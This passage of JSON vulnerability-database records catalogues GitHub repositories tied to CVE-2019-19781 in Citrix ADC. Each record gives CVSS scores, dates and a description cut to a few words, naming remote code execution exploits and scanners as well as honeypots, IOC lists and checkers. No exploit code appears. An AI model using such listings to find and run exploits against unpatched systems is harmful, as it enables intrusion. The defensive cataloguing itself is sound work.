"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-28T21:23:04", "id": "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:28", "description": "Based on a **Splunk** perspective.\nBelow resources show that ing...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T08:41:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-24T10:45:10", "id": "607F0EF9-B234-570A-9E89-A73FBE248E6F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-11T09:14:12", "description": "# Citrix ADC (NetScaler) Honeypot\n- Detects and logs payloads fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-22T13:00:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-05-11T04:52:56", "id": "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-24T16:52:14", "description": "# CVE-2019-19781\n\nThis was only uploaded due to other researcher...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T00:08:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-06-24T03:52:03", "id": "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:51", "description": "# citrix.sh\nCVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-20T15:30:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-19T01:10:14", "id": "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:55", "description": "# citrix_dir_traversal_rce\n\nA directory traversal was discovered...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T14:07:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-04-05T04:22:21", "id": "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-22T13:39:34", "description": "# CVE-2019-19781\nRemote Code Execution Exploit for Citrix Applic...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-10T22:56:35", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-22T11:43:10", "id": "5DD13827-3FCE-5166-806D-088441D41514", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-16T21:34:51", "description": "# CVE-2019-19781 citrixmash scanner\n\nA multithreaded scanner for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-12T15:16:54", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-06-16T20:16:19", "id": "39093366-D071-5898-A67D-A99B956B6E73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:58", "description": "# CVE-2019-19781\nCVE-2019-19781 Attack Triage Script\n\nThe script...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T16:14:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-21T16:48:21", "id": "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:04", "description": "# Detect-CVE-2019-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T10:09:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T10:35:07", "id": "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:08", "description": "# CVE-2019-19781_IOCs\nIOCs for CVE-2019-19781\n\ncitrixhoneypotnsl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T19:32:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T19:37:59", "id": "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T21:29:49", "description": "# Honepot for CVE-2019-19781 (Citrix ADC)\nDetect and log CVE-201...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-13T10:09:31", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-27T07:11:27", "id": "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:12", "description": "# CVE-2019-19781-Checker\nCheck your website for CVE-2019-19781 V...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T10:15:11", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T10:20:33", "id": "721C46F4-C390-5D23-B358-3D4B22959428", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:18", "description": "# CVE-2019-19781\r\nAutomated script for Citrix ADC scanner ([CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T07:42:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-02-26T19:27:56", "id": "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T04:32:15", "description": "# CVE-2019-19781 Citrix ADC Remote Code Execution\n\n![](./CVE-201...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T03:10:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-21T03:53:26", "id": "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:34", "description": "# CVE-2019-19781\nCitr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T13:05:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-09-17T11:46:50", "id": "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T15:02:06", "description": "# CVE-2019-19781\n\n\u652f\u6301\u6279\u91cf\u68c0\u6d4b\n\nUsage:\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-10T02:05:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-20T11:41:57", "id": "CF9EC818-A904-586C-9C19-3B4F04770FBD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T23:15:01", "description": "# CVE-2019-19781\nRemote Code Execution Exploit for C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T07:16:23", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-20T22:46:29", "id": "988A0BAB-669A-57AE-B432-564B2E378252", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:12", "description": "# CVE-2019-19781\n\nCVE-2019-19781 Module for [Router Scan Project...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-26T08:00:22", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-05-26T08:05:13", "id": "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:54:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-08T10:42:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-28T06:33:59", "id": "3BFD8B83-5790-508D-8B9C-58C171517BD0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:49", "description": "# CVE-NetScalerFileSystemCheck\r\nThis script checks the Citrix Ne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 